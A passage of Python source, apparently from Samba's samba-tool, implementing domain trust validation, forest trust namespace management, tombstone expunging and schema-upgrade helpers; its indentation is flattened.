if remote_trust_verify.flags & netlogon.NETLOGON_VERIFY_STATUS_RETURNED:
remote_validation = "RemoteValidation: DC[%s] CONNECTION[%s] TRUST[%s] VERIFY_STATUS_RETURNED" % (
remote_trust_verify.trusted_dc_name,
remote_trust_verify.tc_connection_status[1],
remote_trust_verify.pdc_connection_status[1])
else:
remote_validation = "RemoteValidation: DC[%s] CONNECTION[%s] TRUST[%s]" % (
remote_trust_verify.trusted_dc_name,
remote_trust_verify.tc_connection_status[1],
remote_trust_verify.pdc_connection_status[1])
if remote_trust_status != werror.WERR_SUCCESS or remote_conn_status != werror.WERR_SUCCESS:
raise CommandError(remote_validation)
else:
self.outf.write("OK: %s\n" % remote_validation)
try:
server = remote_trust_verify.trusted_dc_name.replace('\\', '')
domain_and_server = "%s\\%s" % (local_lsa_info.dns_domain.string, server)
remote_trust_rediscover = \
remote_netlogon.netr_LogonControl2Ex(remote_server,
netlogon.NETLOGON_CONTROL_REDISCOVER,
2,
domain_and_server)
except RuntimeError as error:
raise self.RemoteRuntimeError(self, error, "NETLOGON_CONTROL_REDISCOVER failed")
remote_conn_status = self._uint32(remote_trust_rediscover.tc_connection_status[0])
remote_rediscover = "RemoteRediscover: DC[%s] CONNECTION[%s]" % (
remote_trust_rediscover.trusted_dc_name,
remote_trust_rediscover.tc_connection_status[1])
if remote_conn_status != werror.WERR_SUCCESS:
raise CommandError(remote_rediscover)
else:
self.outf.write("OK: %s\n" % remote_rediscover)
return
class cmd_domain_trust_namespaces(DomainTrustCommand):
"""Manage forest trust namespaces."""
synopsis = "%prog [DOMAIN] [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"localdcopts": LocalDCCredentialsOptions,
}
takes_options = [
Option("--refresh", type="choice", metavar="check|store",
choices=["check", "store", None],
help="List and maybe store refreshed forest trust information: 'check' or 'store'.",
dest='refresh',
default=None),
Option("--enable-all", action="store_true",
help="Try to update disabled entries, not allowed with --refresh=check.",
dest='enable_all',
default=False),
Option("--enable-tln", action="append", metavar='DNSDOMAIN',
help="Enable a top level name entry. Can be specified multiple times.",
dest='enable_tln',
default=[]),
Option("--disable-tln", action="append", metavar='DNSDOMAIN',
help="Disable a top level name entry. Can be specified multiple times.",
dest='disable_tln',
default=[]),
Option("--add-tln-ex", action="append", metavar='DNSDOMAIN',
help="Add a top level exclusion entry. Can be specified multiple times.",
dest='add_tln_ex',
default=[]),
Option("--delete-tln-ex", action="append", metavar='DNSDOMAIN',
help="Delete a top level exclusion entry. Can be specified multiple times.",
dest='delete_tln_ex',
default=[]),
Option("--enable-nb", action="append", metavar='NETBIOSDOMAIN',
help="Enable a netbios name in a domain entry. Can be specified multiple times.",
dest='enable_nb',
default=[]),
Option("--disable-nb", action="append", metavar='NETBIOSDOMAIN',
help="Disable a netbios name in a domain entry. Can be specified multiple times.",
dest='disable_nb',
default=[]),
Option("--enable-sid", action="append", metavar='DOMAINSID',
help="Enable a SID in a domain entry. Can be specified multiple times.",
dest='enable_sid_str',
default=[]),
Option("--disable-sid", action="append", metavar='DOMAINSID',
help="Disable a SID in a domain entry. Can be specified multiple times.",
dest='disable_sid_str',
default=[]),
Option("--add-upn-suffix", action="append", metavar='DNSDOMAIN',
help="Add a new uPNSuffixes attribute for the local forest. Can be specified multiple times.",
dest='add_upn',
default=[]),
Option("--delete-upn-suffix", action="append", metavar='DNSDOMAIN',
help="Delete an existing uPNSuffixes attribute of the local forest. Can be specified multiple times.",
dest='delete_upn',
default=[]),
Option("--add-spn-suffix", action="append", metavar='DNSDOMAIN',
help="Add a new msDS-SPNSuffixes attribute for the local forest. Can be specified multiple times.",
dest='add_spn',
default=[]),
Option("--delete-spn-suffix", action="append", metavar='DNSDOMAIN',
help="Delete an existing msDS-SPNSuffixes attribute of the local forest. Can be specified multiple times.",
dest='delete_spn',
default=[]),
]
takes_args = ["domain?"]
def run(self, domain=None, sambaopts=None, localdcopts=None, versionopts=None,
refresh=None, enable_all=False,
enable_tln=[], disable_tln=[], add_tln_ex=[], delete_tln_ex=[],
enable_sid_str=[], disable_sid_str=[], enable_nb=[], disable_nb=[],
add_upn=[], delete_upn=[], add_spn=[], delete_spn=[]):
require_update = False
if domain is None:
if refresh == "store":
raise CommandError("--refresh=%s not allowed without DOMAIN" % refresh)
if enable_all:
raise CommandError("--enable-all not allowed without DOMAIN")
if len(enable_tln) > 0:
raise CommandError("--enable-tln not allowed without DOMAIN")
if len(disable_tln) > 0:
raise CommandError("--disable-tln not allowed without DOMAIN")
if len(add_tln_ex) > 0:
raise CommandError("--add-tln-ex not allowed without DOMAIN")
if len(delete_tln_ex) > 0:
raise CommandError("--delete-tln-ex not allowed without DOMAIN")
if len(enable_nb) > 0:
raise CommandError("--enable-nb not allowed without DOMAIN")
if len(disable_nb) > 0:
raise CommandError("--disable-nb not allowed without DOMAIN")
if len(enable_sid_str) > 0:
raise CommandError("--enable-sid not allowed without DOMAIN")
if len(disable_sid_str) > 0:
raise CommandError("--disable-sid not allowed without DOMAIN")
if len(add_upn) > 0:
for n in add_upn:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --add-upn-suffix should not include with '*.'" % n)
require_update = True
if len(delete_upn) > 0:
for n in delete_upn:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --delete-upn-suffix should not include with '*.'" % n)
require_update = True
for a in add_upn:
for d in delete_upn:
if a.lower() != d.lower():
continue
raise CommandError("value[%s] specified for --add-upn-suffix and --delete-upn-suffix" % a)
if len(add_spn) > 0:
for n in add_spn:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --add-spn-suffix should not include with '*.'" % n)
require_update = True
if len(delete_spn) > 0:
for n in delete_spn:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --delete-spn-suffix should not include with '*.'" % n)
require_update = True
for a in add_spn:
for d in delete_spn:
if a.lower() != d.lower():
continue
raise CommandError("value[%s] specified for --add-spn-suffix and --delete-spn-suffix" % a)
else:
if len(add_upn) > 0:
raise CommandError("--add-upn-suffix not allowed together with DOMAIN")
if len(delete_upn) > 0:
raise CommandError("--delete-upn-suffix not allowed together with DOMAIN")
if len(add_spn) > 0:
raise CommandError("--add-spn-suffix not allowed together with DOMAIN")
if len(delete_spn) > 0:
raise CommandError("--delete-spn-suffix not allowed together with DOMAIN")
if refresh is not None:
if refresh == "store":
require_update = True
if enable_all and refresh != "store":
raise CommandError("--enable-all not allowed together with --refresh=%s" % refresh)
if len(enable_tln) > 0:
raise CommandError("--enable-tln not allowed together with --refresh")
if len(disable_tln) > 0:
raise CommandError("--disable-tln not allowed together with --refresh")
if len(add_tln_ex) > 0:
raise CommandError("--add-tln-ex not allowed together with --refresh")
if len(delete_tln_ex) > 0:
raise CommandError("--delete-tln-ex not allowed together with --refresh")
if len(enable_nb) > 0:
raise CommandError("--enable-nb not allowed together with --refresh")
if len(disable_nb) > 0:
raise CommandError("--disable-nb not allowed together with --refresh")
if len(enable_sid_str) > 0:
raise CommandError("--enable-sid not allowed together with --refresh")
if len(disable_sid_str) > 0:
raise CommandError("--disable-sid not allowed together with --refresh")
else:
if enable_all:
require_update = True
if len(enable_tln) > 0:
raise CommandError("--enable-tln not allowed together with --enable-all")
if len(enable_nb) > 0:
raise CommandError("--enable-nb not allowed together with --enable-all")
if len(enable_sid_str) > 0:
raise CommandError("--enable-sid not allowed together with --enable-all")
if len(enable_tln) > 0:
require_update = True
if len(disable_tln) > 0:
require_update = True
for e in enable_tln:
for d in disable_tln:
if e.lower() != d.lower():
continue
raise CommandError("value[%s] specified for --enable-tln and --disable-tln" % e)
if len(add_tln_ex) > 0:
for n in add_tln_ex:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --add-tln-ex should not include with '*.'" % n)
require_update = True
if len(delete_tln_ex) > 0:
for n in delete_tln_ex:
if not n.startswith("*."):
continue
raise CommandError("value[%s] specified for --delete-tln-ex should not include with '*.'" % n)
require_update = True
for a in add_tln_ex:
for d in delete_tln_ex:
if a.lower() != d.lower():
continue
raise CommandError("value[%s] specified for --add-tln-ex and --delete-tln-ex" % a)
if len(enable_nb) > 0:
require_update = True
if len(disable_nb) > 0:
require_update = True
for e in enable_nb:
for d in disable_nb:
if e.upper() != d.upper():
continue
raise CommandError("value[%s] specified for --enable-nb and --disable-nb" % e)
enable_sid = []
for s in enable_sid_str:
try:
sid = security.dom_sid(s)
except TypeError as error:
raise CommandError("value[%s] specified for --enable-sid is not a valid SID" % s)
enable_sid.append(sid)
disable_sid = []
for s in disable_sid_str:
try:
sid = security.dom_sid(s)
except TypeError as error:
raise CommandError("value[%s] specified for --disable-sid is not a valid SID" % s)
disable_sid.append(sid)
if len(enable_sid) > 0:
require_update = True
if len(disable_sid) > 0:
require_update = True
for e in enable_sid:
for d in disable_sid:
if e != d:
continue
raise CommandError("value[%s] specified for --enable-sid and --disable-sid" % e)
local_policy_access = lsa.LSA_POLICY_VIEW_LOCAL_INFORMATION
if require_update:
local_policy_access |= lsa.LSA_POLICY_TRUST_ADMIN
local_server = self.setup_local_server(sambaopts, localdcopts)
try:
local_lsa = self.new_local_lsa_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect lsa server")
try:
(local_policy, local_lsa_info) = self.get_lsa_info(local_lsa, local_policy_access)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to query LSA_POLICY_INFO_DNS")
self.outf.write("LocalDomain Netbios[%s] DNS[%s] SID[%s]\n" % (
local_lsa_info.name.string,
local_lsa_info.dns_domain.string,
local_lsa_info.sid))
if domain is None:
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_netlogon_info = self.get_netlogon_dc_info(local_netlogon, local_server)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to get netlogon dc info")
if local_netlogon_info.domain_name != local_netlogon_info.forest_name:
raise CommandError("The local domain [%s] is not the forest root [%s]" % (
local_netlogon_info.domain_name,
local_netlogon_info.forest_name))
try:
# get all information about our own forest
own_forest_info = local_netlogon.netr_DsRGetForestTrustInformation(local_netlogon_info.dc_unc,
None, 0)
except RuntimeError as error:
if self.check_runtime_error(error, werror.WERR_RPC_S_PROCNUM_OUT_OF_RANGE):
raise CommandError("LOCAL_DC[%s]: netr_DsRGetForestTrustInformation() not supported." % (
self.local_server))
if self.check_runtime_error(error, werror.WERR_INVALID_FUNCTION):
raise CommandError("LOCAL_DC[%s]: netr_DsRGetForestTrustInformation() not supported." % (
self.local_server))
if self.check_runtime_error(error, werror.WERR_NERR_ACFNOTLOADED):
raise CommandError("LOCAL_DC[%s]: netr_DsRGetForestTrustInformation() not supported." % (
self.local_server))
raise self.LocalRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
self.outf.write("Own forest trust information...\n")
self.write_forest_trust_info(own_forest_info,
tln=local_lsa_info.dns_domain.string)
try:
local_samdb = self.new_local_ldap_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect to SamDB")
local_partitions_dn = "CN=Partitions,%s" % str(local_samdb.get_config_basedn())
attrs = ['uPNSuffixes', 'msDS-SPNSuffixes']
try:
msgs = local_samdb.search(base=local_partitions_dn,
scope=ldb.SCOPE_BASE,
expression="(objectClass=crossRefContainer)",
attrs=attrs)
stored_msg = msgs[0]
except ldb.LdbError as error:
raise self.LocalLdbError(self, error, "failed to search partition dn")
stored_upn_vals = []
if 'uPNSuffixes' in stored_msg:
stored_upn_vals.extend(stored_msg['uPNSuffixes'])
stored_spn_vals = []
if 'msDS-SPNSuffixes' in stored_msg:
stored_spn_vals.extend(stored_msg['msDS-SPNSuffixes'])
self.outf.write("Stored uPNSuffixes attributes[%d]:\n" % len(stored_upn_vals))
for v in stored_upn_vals:
self.outf.write("TLN: %-32s DNS[*.%s]\n" % ("", v))
self.outf.write("Stored msDS-SPNSuffixes attributes[%d]:\n" % len(stored_spn_vals))
for v in stored_spn_vals:
self.outf.write("TLN: %-32s DNS[*.%s]\n" % ("", v))
if not require_update:
return
replace_upn = False
update_upn_vals = []
update_upn_vals.extend(stored_upn_vals)
replace_spn = False
update_spn_vals = []
update_spn_vals.extend(stored_spn_vals)
for upn in add_upn:
for i, v in enumerate(update_upn_vals):
if str(v).lower() == upn.lower():
raise CommandError("Entry already present for "
"value[%s] specified for "
"--add-upn-suffix" % upn)
update_upn_vals.append(upn)
replace_upn = True
for upn in delete_upn:
idx = None
for i, v in enumerate(update_upn_vals):
if str(v).lower() != upn.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-upn-suffix" % upn)
update_upn_vals.pop(idx)
replace_upn = True
for spn in add_spn:
for i, v in enumerate(update_spn_vals):
if str(v).lower() == spn.lower():
raise CommandError("Entry already present for "
"value[%s] specified for "
"--add-spn-suffix" % spn)
update_spn_vals.append(spn)
replace_spn = True
for spn in delete_spn:
idx = None
for i, v in enumerate(update_spn_vals):
if str(v).lower() != spn.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-spn-suffix" % spn)
update_spn_vals.pop(idx)
replace_spn = True
self.outf.write("Update uPNSuffixes attributes[%d]:\n" % len(update_upn_vals))
for v in update_upn_vals:
self.outf.write("TLN: %-32s DNS[*.%s]\n" % ("", v))
self.outf.write("Update msDS-SPNSuffixes attributes[%d]:\n" % len(update_spn_vals))
for v in update_spn_vals:
self.outf.write("TLN: %-32s DNS[*.%s]\n" % ("", v))
update_msg = ldb.Message()
update_msg.dn = stored_msg.dn
if replace_upn:
update_msg['uPNSuffixes'] = ldb.MessageElement(update_upn_vals,
ldb.FLAG_MOD_REPLACE,
'uPNSuffixes')
if replace_spn:
update_msg['msDS-SPNSuffixes'] = ldb.MessageElement(update_spn_vals,
ldb.FLAG_MOD_REPLACE,
'msDS-SPNSuffixes')
try:
local_samdb.modify(update_msg)
except ldb.LdbError as error:
raise self.LocalLdbError(self, error, "failed to update partition dn")
try:
stored_forest_info = local_netlogon.netr_DsRGetForestTrustInformation(local_netlogon_info.dc_unc,
None, 0)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
self.outf.write("Stored forest trust information...\n")
self.write_forest_trust_info(stored_forest_info,
tln=local_lsa_info.dns_domain.string)
return
try:
lsaString = lsa.String()
lsaString.string = domain
local_tdo_info = \
local_lsa.QueryTrustedDomainInfoByName(local_policy,
lsaString,
lsa.LSA_TRUSTED_DOMAIN_INFO_INFO_EX)
except NTSTATUSError as error:
if self.check_runtime_error(error, ntstatus.NT_STATUS_OBJECT_NAME_NOT_FOUND):
raise CommandError("trusted domain object does not exist for domain [%s]" % domain)
raise self.LocalRuntimeError(self, error, "QueryTrustedDomainInfoByName(INFO_EX) failed")
self.outf.write("LocalTDO Netbios[%s] DNS[%s] SID[%s]\n" % (
local_tdo_info.netbios_name.string,
local_tdo_info.domain_name.string,
local_tdo_info.sid))
if not local_tdo_info.trust_attributes & lsa.LSA_TRUST_ATTRIBUTE_FOREST_TRANSITIVE:
raise CommandError("trusted domain object for domain [%s] is not marked as FOREST_TRANSITIVE." % domain)
if refresh is not None:
try:
local_netlogon = self.new_local_netlogon_connection()
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to connect netlogon server")
try:
local_netlogon_info = self.get_netlogon_dc_info(local_netlogon, local_server)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "failed to get netlogon dc info")
lsa_update_check = 1
if refresh == "store":
netlogon_update_tdo = netlogon.DS_GFTI_UPDATE_TDO
if enable_all:
lsa_update_check = 0
else:
netlogon_update_tdo = 0
try:
# get all information about the remote trust
# this triggers netr_GetForestTrustInformation to the remote domain
# and lsaRSetForestTrustInformation() locally, but new top level
# names are disabled by default.
fresh_forest_info = \
local_netlogon.netr_DsRGetForestTrustInformation(local_netlogon_info.dc_unc,
local_tdo_info.domain_name.string,
netlogon_update_tdo)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "netr_DsRGetForestTrustInformation() failed")
try:
fresh_forest_collision = \
local_lsa.lsaRSetForestTrustInformation(local_policy,
local_tdo_info.domain_name,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO,
fresh_forest_info,
lsa_update_check)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRSetForestTrustInformation() failed")
self.outf.write("Fresh forest trust information...\n")
self.write_forest_trust_info(fresh_forest_info,
tln=local_tdo_info.domain_name.string,
collisions=fresh_forest_collision)
if refresh == "store":
try:
lsaString = lsa.String()
lsaString.string = local_tdo_info.domain_name.string
stored_forest_info = \
local_lsa.lsaRQueryForestTrustInformation(local_policy,
lsaString,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRQueryForestTrustInformation() failed")
self.outf.write("Stored forest trust information...\n")
self.write_forest_trust_info(stored_forest_info,
tln=local_tdo_info.domain_name.string)
return
#
# The none --refresh path
#
try:
lsaString = lsa.String()
lsaString.string = local_tdo_info.domain_name.string
local_forest_info = \
local_lsa.lsaRQueryForestTrustInformation(local_policy,
lsaString,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRQueryForestTrustInformation() failed")
self.outf.write("Local forest trust information...\n")
self.write_forest_trust_info(local_forest_info,
tln=local_tdo_info.domain_name.string)
if not require_update:
return
entries = []
entries.extend(local_forest_info.entries)
update_forest_info = lsa.ForestTrustInformation()
update_forest_info.count = len(entries)
update_forest_info.entries = entries
if enable_all:
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
continue
if update_forest_info.entries[i].flags == 0:
continue
update_forest_info.entries[i].time = 0
update_forest_info.entries[i].flags &= ~lsa.LSA_TLN_DISABLED_MASK
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if update_forest_info.entries[i].flags == 0:
continue
update_forest_info.entries[i].time = 0
update_forest_info.entries[i].flags &= ~lsa.LSA_NB_DISABLED_MASK
update_forest_info.entries[i].flags &= ~lsa.LSA_SID_DISABLED_MASK
for tln in enable_tln:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
continue
if r.forest_trust_data.string.lower() != tln.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --enable-tln" % tln)
if not update_forest_info.entries[idx].flags & lsa.LSA_TLN_DISABLED_MASK:
raise CommandError("Entry found for value[%s] specified for --enable-tln is already enabled" % tln)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_TLN_DISABLED_MASK
for tln in disable_tln:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
continue
if r.forest_trust_data.string.lower() != tln.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --disable-tln" % tln)
if update_forest_info.entries[idx].flags & lsa.LSA_TLN_DISABLED_ADMIN:
raise CommandError("Entry found for value[%s] specified for --disable-tln is already disabled" % tln)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_TLN_DISABLED_MASK
update_forest_info.entries[idx].flags |= lsa.LSA_TLN_DISABLED_ADMIN
for tln_ex in add_tln_ex:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME_EX:
continue
if r.forest_trust_data.string.lower() != tln_ex.lower():
continue
idx = i
break
if idx is not None:
raise CommandError("Entry already present for value[%s] specified for --add-tln-ex" % tln_ex)
tln_dot = ".%s" % tln_ex.lower()
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME:
continue
r_dot = ".%s" % r.forest_trust_data.string.lower()
if tln_dot == r_dot:
raise CommandError("TLN entry present for value[%s] specified for --add-tln-ex" % tln_ex)
if not tln_dot.endswith(r_dot):
continue
idx = i
break
if idx is None:
raise CommandError("No TLN parent present for value[%s] specified for --add-tln-ex" % tln_ex)
r = lsa.ForestTrustRecord()
r.type = lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME_EX
r.flags = 0
r.time = 0
r.forest_trust_data.string = tln_ex
entries = []
entries.extend(update_forest_info.entries)
entries.insert(idx + 1, r)
update_forest_info.count = len(entries)
update_forest_info.entries = entries
for tln_ex in delete_tln_ex:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_TOP_LEVEL_NAME_EX:
continue
if r.forest_trust_data.string.lower() != tln_ex.lower():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-tln-ex" % tln_ex)
entries = []
entries.extend(update_forest_info.entries)
entries.pop(idx)
update_forest_info.count = len(entries)
update_forest_info.entries = entries
for nb in enable_nb:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if r.forest_trust_data.netbios_domain_name.string.upper() != nb.upper():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --enable-nb" % nb)
if not update_forest_info.entries[idx].flags & lsa.LSA_NB_DISABLED_MASK:
raise CommandError("Entry found for value[%s] specified for --enable-nb is already enabled" % nb)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_NB_DISABLED_MASK
for nb in disable_nb:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if r.forest_trust_data.netbios_domain_name.string.upper() != nb.upper():
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-nb" % nb)
if update_forest_info.entries[idx].flags & lsa.LSA_NB_DISABLED_ADMIN:
raise CommandError("Entry found for value[%s] specified for --disable-nb is already disabled" % nb)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_NB_DISABLED_MASK
update_forest_info.entries[idx].flags |= lsa.LSA_NB_DISABLED_ADMIN
for sid in enable_sid:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if r.forest_trust_data.domain_sid != sid:
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --enable-sid" % sid)
if not update_forest_info.entries[idx].flags & lsa.LSA_SID_DISABLED_MASK:
raise CommandError("Entry found for value[%s] specified for --enable-sid is already enabled" % nb)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_SID_DISABLED_MASK
for sid in disable_sid:
idx = None
for i, r in enumerate(update_forest_info.entries):
if r.type != lsa.LSA_FOREST_TRUST_DOMAIN_INFO:
continue
if r.forest_trust_data.domain_sid != sid:
continue
idx = i
break
if idx is None:
raise CommandError("Entry not found for value[%s] specified for --delete-sid" % sid)
if update_forest_info.entries[idx].flags & lsa.LSA_SID_DISABLED_ADMIN:
raise CommandError("Entry found for value[%s] specified for --disable-sid is already disabled" % nb)
update_forest_info.entries[idx].time = 0
update_forest_info.entries[idx].flags &= ~lsa.LSA_SID_DISABLED_MASK
update_forest_info.entries[idx].flags |= lsa.LSA_SID_DISABLED_ADMIN
try:
update_forest_collision = local_lsa.lsaRSetForestTrustInformation(local_policy,
local_tdo_info.domain_name,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO,
update_forest_info, 0)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRSetForestTrustInformation() failed")
self.outf.write("Updated forest trust information...\n")
self.write_forest_trust_info(update_forest_info,
tln=local_tdo_info.domain_name.string,
collisions=update_forest_collision)
try:
lsaString = lsa.String()
lsaString.string = local_tdo_info.domain_name.string
stored_forest_info = local_lsa.lsaRQueryForestTrustInformation(local_policy,
lsaString,
lsa.LSA_FOREST_TRUST_DOMAIN_INFO)
except RuntimeError as error:
raise self.LocalRuntimeError(self, error, "lsaRQueryForestTrustInformation() failed")
self.outf.write("Stored forest trust information...\n")
self.write_forest_trust_info(stored_forest_info,
tln=local_tdo_info.domain_name.string)
return
class cmd_domain_tombstones_expunge(Command):
"""Expunge tombstones from the database.
This command expunges tombstones from the database."""
synopsis = "%prog NC [NC [...]] [options]"
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("--current-time",
help="The current time to evaluate the tombstone lifetime from, expressed as YYYY-MM-DD",
type=str),
Option("--tombstone-lifetime", help="Number of days a tombstone should be preserved for", type=int),
]
takes_args = ["nc*"]
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
def run(self, *ncs, **kwargs):
sambaopts = kwargs.get("sambaopts")
credopts = kwargs.get("credopts")
H = kwargs.get("H")
current_time_string = kwargs.get("current_time")
tombstone_lifetime = kwargs.get("tombstone_lifetime")
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
samdb = SamDB(url=H, session_info=system_session(),
credentials=creds, lp=lp)
if current_time_string is not None:
current_time_obj = time.strptime(current_time_string, "%Y-%m-%d")
current_time = int(time.mktime(current_time_obj))
else:
current_time = int(time.time())
if len(ncs) == 0:
res = samdb.search(expression="", base="", scope=ldb.SCOPE_BASE,
attrs=["namingContexts"])
ncs = []
for nc in res[0]["namingContexts"]:
ncs.append(str(nc))
else:
ncs = list(ncs)
started_transaction = False
try:
samdb.transaction_start()
started_transaction = True
(removed_objects,
removed_links) = samdb.garbage_collect_tombstones(ncs,
current_time=current_time,
tombstone_lifetime=tombstone_lifetime)
except Exception as err:
if started_transaction:
samdb.transaction_cancel()
raise CommandError("Failed to expunge / garbage collect tombstones", err)
samdb.transaction_commit()
self.outf.write("Removed %d objects and %d links successfully\n"
% (removed_objects, removed_links))
class cmd_domain_trust(SuperCommand):
"""Domain and forest trust management."""
subcommands = {}
subcommands["list"] = cmd_domain_trust_list()
subcommands["show"] = cmd_domain_trust_show()
subcommands["create"] = cmd_domain_trust_create()
subcommands["delete"] = cmd_domain_trust_delete()
subcommands["validate"] = cmd_domain_trust_validate()
subcommands["namespaces"] = cmd_domain_trust_namespaces()
class cmd_domain_tombstones(SuperCommand):
"""Domain tombstone and recycled object management."""
subcommands = {}
subcommands["expunge"] = cmd_domain_tombstones_expunge()
class ldif_schema_update:
"""Helper class for applying LDIF schema updates"""
def __init__(self):
self.is_defunct = False
self.unknown_oid = None
self.dn = None
self.ldif = ""
def can_ignore_failure(self, error):
"""Checks if we can safely ignore failure to apply an LDIF update"""
(num, errstr) = error.args
# Microsoft has marked objects as defunct that Samba doesn't know about
if num == ldb.ERR_NO_SUCH_OBJECT and self.is_defunct:
print("Defunct object %s doesn't exist, skipping" % self.dn)
return True
elif self.unknown_oid is not None:
print("Skipping unknown OID %s for object %s" % (self.unknown_oid, self.dn))
return True
return False
def apply(self, samdb):
"""Applies a single LDIF update to the schema"""
try:
try:
samdb.modify_ldif(self.ldif, controls=['relax:0'])
except ldb.LdbError as e:
if e.args[0] == ldb.ERR_INVALID_ATTRIBUTE_SYNTAX:
# REFRESH after a failed change
# Otherwise the OID-to-attribute mapping in
# _apply_updates_in_file() won't work, because it
# can't lookup the new OID in the schema
samdb.set_schema_update_now()
samdb.modify_ldif(self.ldif, controls=['relax:0'])
else:
raise
except ldb.LdbError as e:
if self.can_ignore_failure(e):
return 0
else:
print("Exception: %s" % e)
print("Encountered while trying to apply the following LDIF")
print("----------------------------------------------------")
print("%s" % self.ldif)
raise
return 1
class cmd_domain_schema_upgrade(Command):
"""Domain schema upgrading"""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("-q", "--quiet", help="Be quiet", action="store_true"), # unused
Option("-v", "--verbose", help="Be verbose", action="store_true"),
Option("--schema", type="choice", metavar="SCHEMA",
choices=["2012", "2012_R2"],
help="The schema file to upgrade to. Default is (Windows) 2012_R2.",
default="2012_R2"),
Option("--ldf-file", type=str, default=None,
help="Just apply the schema updates in the adprep/.LDF file(s) specified"),
Option("--base-dir", type=str, default=None,
help="Location of ldf files Default is ${SETUPDIR}/adprep.")
]
def _apply_updates_in_file(self, samdb, ldif_file):
"""
Applies a series of updates specified in an .LDIF file. The .LDIF file
is based on the adprep Schema updates provided by Microsoft.
"""
count = 0
ldif_op = ldif_schema_update()
# parse the file line by line and work out each update operation to apply
for line in ldif_file:
line = line.rstrip()
# the operations in the .LDIF file are separated by blank lines. If
# we hit a blank line, try to apply the update we've parsed so far
if line == '':
# keep going if we haven't parsed anything yet
if ldif_op.ldif == '':
continue
# Apply the individual change
count += ldif_op.apply(samdb)
# start storing the next operation from scratch again
ldif_op = ldif_schema_update()
continue
# replace the placeholder domain name in the .ldif file with the real domain
if line.upper().endswith('DC=X'):
line = line[:-len('DC=X')] + str(samdb.get_default_basedn())
elif line.upper().endswith('CN=X'):
line = line[:-len('CN=X')] + str(samdb.get_default_basedn())
values = line.split(':')
if values[0].lower() == 'dn':
ldif_op.dn = values[1].strip()
# replace the Windows-specific operation with the Samba one
if values[0].lower() == 'changetype':
line = line.lower().replace(': ntdsschemaadd',
': add')
line = line.lower().replace(': ntdsschemamodify',
': modify')
if values[0].lower() in ['rdnattid', 'subclassof',
'systemposssuperiors',
'systemmaycontain',
